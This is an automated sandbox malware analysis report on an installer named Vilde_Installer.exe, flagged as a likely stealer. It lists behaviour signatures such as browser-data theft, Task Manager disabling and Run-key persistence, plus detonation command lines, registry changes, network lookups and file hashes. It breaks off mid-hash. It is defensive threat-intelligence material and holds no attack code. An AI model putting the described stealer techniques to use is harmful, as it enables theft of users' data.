Malware Analysis Report

2024-11-30 04:14

Sample ID 240613-ahfr2azfqm
Target Vilde_Installer.exe
SHA256 2ac50d15f96dfe78c7df256f995443db82c93e4c746249440d1c0bea315bd78a
Tags
evasion execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

2ac50d15f96dfe78c7df256f995443db82c93e4c746249440d1c0bea315bd78a

Threat Level: Likely malicious

The file Vilde_Installer.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion execution persistence spyware stealer

Disables Task Manager via registry modification

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Checks computer location settings

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Program crash

Unsigned PE

Enumerates physical storage devices

Views/modifies file attributes

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 00:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

161s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240221-en

Max time kernel

125s

Max time network

130s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z

Signatures

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1676 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 1676 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 1676 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f8

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240508-en

Max time kernel

121s

Max time network

134s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sw.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sw.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sw.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sw.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 0b58a7b3c89d3398febfecb8f9db5cb1
SHA1 88c8ac85d830c720a255e9509255ca20654e825b
SHA256 cd3963789c8c04fd1b2d705294ab397bb09a1b4347ce8f37ccb12760e226a8c2
SHA512 1870b403df107c33669078431a3417006047c241d31e2b88c03c22c7dc80180e7cb8106a2027d458cbe5b7863696580fdfe4eafef519c7879d4ec79d15d74d27

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20231129-en

Max time kernel

121s

Max time network

129s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sr.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sr.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sr.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sr.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 72c099d847b07ebaa67a766c5676e17a
SHA1 e8e9db6e653713529e74c398eb8725506a64f16e
SHA256 653b5a9dcd035195efbd7c763db1417c82a82c2869482795dea72a938315f20f
SHA512 f346d454e137de1d2e2154581651b0b005f1b9faddb12de0100495c1fe75351b869eecc833043f2754ca9cf38eec3f050c0b5afc7e2d8aa98186d074c4cf7473

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

145s

Max time network

152s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 752 wrote to memory of 944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 752 wrote to memory of 944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 752 wrote to memory of 944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 944 -ip 944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 612

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win10v2004-20240226-en

Max time kernel

135s

Max time network

166s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4048 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4048 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4444 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 154.141.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20231129-en

Max time kernel

119s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 220

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

56s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ro.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ro.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240220-en

Max time kernel

120s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ta.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ta.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\ta.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\ta.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 08a411679d9d4a74c405669802058d01
SHA1 ab6dd3026c4df416ce50c0f9164d07fc38d89f72
SHA256 7d4be23c5deaad9ca6d467e85a56ae2391ff15284be5364341a6f91091977ae7
SHA512 375249db6c3fb080433c9afa8afd54918e029847157ea83ef129f3673368198ef096390355bc22bec47d8975d733ae61a346d0fa4c004119240def937e29f7d0

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240220-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe"

C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe

C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\chrome_100_percent.pak

MD5 a0e681fdd4613e0fff6fb8bf33a00ef1
SHA1 6789bacfe0b244ab6872bd3acc1e92030276011e
SHA256 86f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2
SHA512 6f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\chrome_200_percent.pak

MD5 c37bd7a6b677a37313b7ecc4ff01b6f5
SHA1 79db970c44347bd3566cefb6cabd1995e8e173df
SHA256 8c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a
SHA512 a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\d3dcompiler_47.dll

MD5 2191e768cc2e19009dad20dc999135a3
SHA1 f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA256 7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA512 5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\ffmpeg.dll

MD5 14e00bf1d9d0df65f8b1a31240d474a8
SHA1 f9fe033725b7b1b5c0efce7a14ed7ab223cb32e8
SHA256 9d1eb0c6eb12bfa87e74a65c2fde5d61c4c93e21fb0800bbdccb6559527036a5
SHA512 652724450296a739de802ba8fac482953146f37665718446e448a350295e1e7b09bd460835bcd0ac26b2e54bb9b791624a9eea11e6c96573c7c4aed22450ed14

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\icudtl.dat

MD5 e0f1ad85c0933ecce2e003a2c59ae726
SHA1 a8539fc5a233558edfa264a34f7af6187c3f0d4f
SHA256 f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb
SHA512 714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\libEGL.dll

MD5 1dcf5ac3cb0dcda9c9679eeb018d01bd
SHA1 bc21697c5665aab5eaaba61f55719d43328f7e7c
SHA256 9cfc3001191e8b3eb9c96ba29e57e5bf9aaab264e83897e47cb968167a8a811b
SHA512 47d8769bf00cc7555479542abf5e0684799e424d9801dad8c6bd199680d9c40cfa2380d969515db7a0753cf6f3a9733b5afb931fe33863fe30a37092d8dc96b1

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\libGLESv2.dll

MD5 51378647d290f3a08affa8454a3d59d5
SHA1 32152a6677c82ea9e2e842baa907d708b46a6779
SHA256 80c2ef6ca6d0ff4877bd0c0bc082ff19c3a5002d53648bcf5f54368560f9a411
SHA512 ca90f5131d95fdb1e4a5cb7cb2bbef08676f70367b255270871754f776937994e34258084bf46437b25e1745728c279594d64e0718643eac0ac00cfc43d2c53b

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\LICENSES.chromium.html

MD5 2675b30d524b6c79b6cee41af86fc619
SHA1 407716c1bb83c211bcb51efbbcb6bf2ef1664e5b
SHA256 6a717038f81271f62318212f00b1a2173b9cb0cc435f984710ac8355eb409081
SHA512 3214341da8bf3347a6874535bb0ff8d059ee604e779491780f2b29172f9963e23acbe3c534d888f7a3b99274f46d0628962e1e72a5d3fc6f18ca2b62343df485

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\resources.pak

MD5 e2088909e43552ad3e9cce053740185d
SHA1 24b23dd4cad49340d88b9cb34e54c3ca0eb0d27f
SHA256 bba36d4d18d64d9627f54c54fd645c5ba459d25a59acc5228210bd707aef67fd
SHA512 dcefacddec38d8941c7d2d7b971b6f22dd0acb4116e48891d1d48a4d88968da12b152ccb7591715c88f8e14c315e235d1c4e6852cc38b9246091c50226900de6

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\v8_context_snapshot.bin

MD5 1a37f6614ff8799b1c063bc83c157cc3
SHA1 8238b9295e1dde9de0d6fd20578e82703131a228
SHA256 4fbe07f71b706c2a2948eba9a6b1979e23c83342b190723a6ec5251b2d6dad7c
SHA512 6677f65a0e26fdc2cff6cef0231f5e5f0713ee7c5cf7f488599a3c7ac3e8365afaec10b35d6145ea58d364151d8bcb08308765693a9797ea99b894d6e8224ac7

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\snapshot_blob.bin

MD5 6fcb8a6c21a7e76a7be2dc237b64916f
SHA1 893ef10567f7705144f407a6493a96ab341c7ccf
